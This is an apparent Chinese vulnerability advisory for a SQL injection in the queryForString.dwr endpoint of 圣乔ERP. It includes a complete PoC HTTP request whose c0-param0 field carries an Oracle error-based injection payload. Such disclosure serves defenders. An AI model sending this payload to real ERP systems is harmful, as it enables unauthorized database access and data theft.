圣乔ERP系统 /erp/dwr/call/plaincall/NamedParameterSingleRowQueryConvertor.queryForString.dwr SQL 注入漏洞

日期: 2024-12-06 | 影响软件: 圣乔ERP系统 | POC: 已公开

漏洞描述

圣乔ERP系统是杭州圣乔科技有限公司开发的一款企业级管理软件,旨在为企业提供一套全面、集成化的管理解决方案,帮助企业实现资源的优化配置和高效利用。该系统集成了财务、人力资源、生产、销售、供应链等多个业务模块,实现了企业内外部信息的无缝连接和实时共享。适用于各种规模的企业,特别是需要实现资源优化配置、提高运营效率和管理水平的企业。圣乔 ERP系统 /erp/dwr/call/plaincall/NamedParameterSingleRowQueryConvertor.queryForString.dwr 接口存在SQL注入漏洞,攻击者可以通过构造恶意请求,执行任意SQL语句,进而可能导致敏感信息泄露或系统被控制。

PoC代码

POST /erp/dwr/call/plaincall/NamedParameterSingleRowQueryConvertor.queryForString.dwr HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close
 
c0-id=0
batchId=0
callCount=1
c0-param1=Object_Object:{}
page=/erp/dwr/test/NamedParameterSingleRowQueryConvertor
httpSessionId=47CA299619667847F1BB450454E6C2D4
scriptSessionId=F3F037EB7A5102043AD4CEB47EB17A7275
c0-scriptName=NamedParameterSingleRowQueryConvertor
c0-methodName=queryForString
c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (99=99) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)

相关漏洞推荐